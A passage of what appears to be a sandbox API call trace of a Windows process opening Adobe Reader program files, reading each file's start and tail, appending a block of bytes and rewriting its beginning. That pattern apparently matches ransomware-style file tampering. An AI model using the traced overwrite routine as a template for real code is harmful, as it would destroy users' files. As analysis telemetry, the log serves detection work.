lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0071.083] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0071.098] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xb288 [0071.098] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.100] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xb288 [0071.101] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.101] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.101] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.101] CloseHandle (hObject=0x1dc) returned 1 [0071.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\RUM\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\rum\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.110] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.110] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xe796 [0071.110] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.111] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.111] ReleaseMutex (hMutex=0x168) returned 1 [0071.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0071.111] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0071.113] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xd796 [0071.113] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.116] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xd796 [0071.116] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.116] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.117] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.117] CloseHandle (hObject=0x1dc) returned 1 [0071.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SUO\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\suo\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.123] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.123] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xd34f [0071.123] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.123] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.123] ReleaseMutex (hMutex=0x168) returned 1 [0071.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0071.123] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0071.127] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xc34f [0071.127] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.132] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0xc34f [0071.133] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.133] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.133] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.133] CloseHandle (hObject=0x1dc) returned 1 [0071.140] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\acroform.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6dc00 [0071.141] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.141] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.141] ReleaseMutex (hMutex=0x168) returned 1 [0071.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CAT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Acroform.CAT", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acroform.CAT", lpUsedDefaultChar=0x0) returned 12 [0071.142] ReadFile (in: hFile=0x1dc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2fdf278*=0x8000, lpOverlapped=0x0) returned 1 [0071.346] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6cc00 [0071.346] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e952a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e952a8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.407] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6cc00 [0071.408] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a8048*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.409] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.409] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0071.409] CloseHandle (hObject=0x1dc) returned 1 [0071.463] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\EScript.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\escript.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.464] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.464] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xa400 [0071.464] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.464] ReleaseMutex (hMutex=0x168) returned 1 [0071.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.465] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EScript.CAT", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EScript.CAT", lpUsedDefaultChar=0x0) returned 11 [0071.465] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0071.499] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9400 [0071.500] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.512] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x9400 [0071.513] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ac078*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25ac078*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.513] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.513] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.513] CloseHandle (hObject=0x1dc) returned 1 [0071.514] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\reflow.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\reflow.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.514] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.515] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1200 [0071.515] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.515] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.515] ReleaseMutex (hMutex=0x168) returned 1 [0071.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CAT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.515] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="reflow.CAT", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="reflow.CAT", lpUsedDefaultChar=0x0) returned 10 [0071.516] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf2bc*=0x1200, lpOverlapped=0x0) returned 1 [0071.548] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0071.548] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1788, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf2d0*=0x1788, lpOverlapped=0x0) returned 1 [0071.549] CloseHandle (hObject=0x1dc) returned 1 [0071.549] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\WebLink.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\weblink.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.549] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.549] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7200 [0071.550] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.550] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.550] ReleaseMutex (hMutex=0x168) returned 1 [0071.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.CAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0071.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WebLink.CAT", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WebLink.CAT", lpUsedDefaultChar=0x0) returned 11 [0071.550] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.571] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6200 [0071.572] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.576] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6200 [0071.577] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.577] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.577] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.577] CloseHandle (hObject=0x1dc) returned 1 [0071.581] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\DVA.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\dva.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.581] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.582] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x4600 [0071.582] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.582] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.582] ReleaseMutex (hMutex=0x168) returned 1 [0071.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CZE", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.CZE", cchWideChar=7, lpMultiByteStr=0x1f7ab94, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.CZE", lpUsedDefaultChar=0x0) returned 7 [0071.582] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.593] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3600 [0071.594] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.600] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x3600 [0071.600] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.601] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.601] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.601] CloseHandle (hObject=0x1dc) returned 1 [0071.601] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\RdLang32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\rdlang32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.602] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.602] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x145000 [0071.603] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.603] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.603] ReleaseMutex (hMutex=0x168) returned 1 [0071.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CZE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.603] 